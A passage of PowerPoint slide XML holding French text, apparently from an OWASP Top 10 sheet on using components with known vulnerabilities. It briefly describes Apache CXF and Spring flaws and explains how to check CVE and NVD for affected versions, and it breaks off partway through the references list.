                        <a:t>Le paysage complet des vulnérabilités est envisageable : injection, violation de contrôle d’accès, XSS, … Ces failles peuvent avoir un impact minime, comme elles peuvent entraîner la compromission totale du système</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="800" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> ou une atteinte aux données.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="800" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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just"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="800" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Il faut mesurer l’impact de chaque vulnérabilité sur le métier supporté par l’application affectée. Ce dernier peut être négligeable comme il peut entraîner un risque vital pour le métier.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="800" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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324600"/>
            <a:ext cx="3383280" cy="28194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fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemple de scénarii d’attaque</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Les risques liés à la vulnérabilité d’un composant peuvent être très variés, allant du risque négligeable au déploiement d’un malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>complexe ciblant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>organisation spécifique. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Puisque la plupart des composants s’exécutent avec les privilèges maximum de l’application, toute faille dans </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>un de ces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> composants peut </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>avoir un impact majeur. Les deux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>composants vulnérables suivants </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ont été téléchargés 22 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>millions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de fois en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2011.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="just">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Apache CXF Authentification </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> En ne fournissant pas de jeton d’authentification, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>les attaquants pouvaient </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>faire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>appel à n’importe quel service web avec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’ensemble des privilèges.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="just">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abus de l’implémentation du langage d’expression de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> permettait </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aux attaquants </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’exécuter du code arbitraire et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ainsi de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prendre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>le contrôle du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>serveur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Toutes les applications utilisant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’une de ces bibliothèques vulnérables étaient vulnérable aux attaques de ces composants directement accessible aux utilisateurs de l’application.  D’autres bibliothèques vulnérables, utilisées plus profondément dans l’application, seraient plus difficilement exploitable.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3581400"/>
            <a:ext cx="3383280" cy="25908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80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suis-je vulnérable à des vulnérabilités connues?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="300" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>En théorie, il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>semble </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>simple d’identifier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>si vous utilisez des composants vulnérables. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malheureusement, les rapports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de vulnérabilités ne permettent pas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>toujours </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de présenter ou de rechercher quelle version d’un composant est concernée </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>par une vulnérabilité. D’autant plus que certaines bibliothèques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n’utilisent pas un système de numérotation de version compréhensible. Le pire étant que l’ensemble des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnérabilités ne sont pas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>centralisées chez un dépositaire unique facilitant leurs recherches, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>même si </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>il est de plus en plus facile de rechercher sur certains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sites comme </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NVD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="fr-FR" sz="700" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Déterminer si vous êtes vulnérable nécessitent de rechercher tout ce qui ressemble à une vulnérabilité dans ces bases et dans les listes de diffusion ou les sites d’annonces des logiciels. Si l’un de vos composants possède une vulnérabilité, il faut vérifier scrupuleusement si votre code fait appel à une fonctionnalité vulnérable du composant et si cette faiblesse entrainerait un risque vous  impactant.  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="6324600"/>
            <a:ext cx="3383280" cy="28194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fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Références</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId4"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Aucune</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Externe</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId4"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Unfortunate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> Reality of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Libraries</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="900" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Open Source Software Security</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Addressing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t> Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Concerns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t> in Open Source Components</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t> MITRE Common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
